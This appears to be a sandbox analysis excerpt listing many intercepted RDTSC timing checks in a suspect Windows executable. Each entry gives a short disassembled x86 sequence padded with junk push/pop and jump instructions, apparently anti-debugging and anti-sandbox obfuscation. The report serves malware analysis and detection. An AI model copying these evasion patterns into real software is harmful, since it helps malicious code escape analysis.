Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78485 second address: F78498 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD4CB7BFF6h 0x00000008 jo 00007FAD4CB7BFF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78498 second address: F7849E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7849E second address: F784AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78A62 second address: F78A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78A68 second address: F78A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78BCF second address: F78BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78BD3 second address: F78BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD4CB7C000h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78D7F second address: F78DB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAD4CB4B57Eh 0x00000013 jl 00007FAD4CB4B57Ch 0x00000019 jg 00007FAD4CB4B576h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78DB7 second address: F78DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7900F second address: F79019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F79019 second address: F7901F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7901F second address: F79044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAD4CB4B578h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B57Bh 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F795B7 second address: F795C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C222 second address: F0C23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAD4CB4B584h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C23E second address: F0C248 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD4CB7BFFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C248 second address: F0C281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FAD4CB4B586h 0x0000000c jmp 00007FAD4CB4B57Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jbe 00007FAD4CB4B576h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push ebx 0x00000023 push edx 0x00000024 pop edx 0x00000025 jo 00007FAD4CB4B576h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E5A4 second address: F7E5A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E70A second address: F7E70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EAE3 second address: F7EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC4B second address: F7EC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC4F second address: F7EC7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD4CB7C006h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC7E second address: F7EC8A instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD4CB4B576h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC8A second address: F7EC8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE03 second address: F7EE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE0E second address: F7EE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE12 second address: F7EE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7F0CE second address: F7F0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7F0D2 second address: F7F0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007FAD4CB4B576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12BF7 second address: F12BFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12BFD second address: F12C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12C03 second address: F12C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E300 second address: F7E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E306 second address: F7E30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E30C second address: F7E315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E315 second address: F7E338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C008h 0x00000009 jne 00007FAD4CB7BFF6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E338 second address: F7E33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E33E second address: F7E342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E342 second address: F7E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FAD4CB4B576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F842EF second address: F84306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007FAD4CB7BFFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84306 second address: F8430B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F845E1 second address: F845EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F845EB second address: F845EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F848CF second address: F848DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB7BFF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84A73 second address: F84A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FAD4CB4B576h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F83FBD second address: F83FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84CFC second address: F84D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD4CB4B57Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FBF second address: F84FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FC3 second address: F84FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAD4CB4B576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FCF second address: F84FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FD7 second address: F84FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FDB second address: F84FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FE1 second address: F85004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAD4CB4B57Dh 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FAD4CB4B597h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F89122 second address: F89128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D63E second address: F8D648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D648 second address: F8D651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D651 second address: F8D65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49928 second address: F33BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d jmp 00007FAD4CB7BFFDh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FAD4CB7BFF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3249h], edx 0x00000033 call dword ptr [ebp+122D34F8h] 0x00000039 pushad 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d jp 00007FAD4CB7BFF6h 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49ABA second address: F49ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49D2A second address: F49D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49E4D second address: F49E7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B57Ch 0x00000008 je 00007FAD4CB4B576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 27053E45h 0x00000017 mov cx, 253Eh 0x0000001b push 0302AE1Bh 0x00000020 pushad 0x00000021 push ebx 0x00000022 push eax 0x00000023 pop eax 0x00000024 pop ebx 0x00000025 jbe 00007FAD4CB4B57Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49F4B second address: F49F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A149 second address: F4A17F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FAD4CB4B583h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FAD4CB4B57Ah 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jl 00007FAD4CB4B576h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A17F second address: F4A185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A371 second address: F4A3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D2EEEh], ecx 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FAD4CB4B578h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b and dx, DE7Dh 0x00000030 nop 0x00000031 jmp 00007FAD4CB4B583h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3C2 second address: F4A3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3C6 second address: F4A3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3CA second address: F4A3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A8D8 second address: F4A8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD4CB4B57Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAA6 second address: F4AABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FAD4CB7BFFCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AABB second address: F4AAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAC1 second address: F4AAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FAD4CB7BFFBh 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAE9 second address: F4AB03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007FAD4CB4B57Eh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AB03 second address: F4AB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FAD4CB7C003h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AC07 second address: F4AC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FAD4CB4B596h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB4B584h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CAFA second address: F8CB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CB00 second address: F8CB2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007FAD4CB4B576h 0x0000000f jmp 00007FAD4CB4B583h 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 jp 00007FAD4CB4B57Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CE15 second address: F8CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FAD4CB7BFF6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF6B second address: F8CF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAD4CB4B576h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF79 second address: F8CF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD4CB7BFF6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF84 second address: F8CF89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF89 second address: F8CF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF97 second address: F8CFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD4CB4B576h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFAB second address: F8CFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFB1 second address: F8CFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFB5 second address: F8CFC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FAD4CB7BFFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9592B second address: F95933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F95A90 second address: F95AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C000h 0x00000009 rdtsc
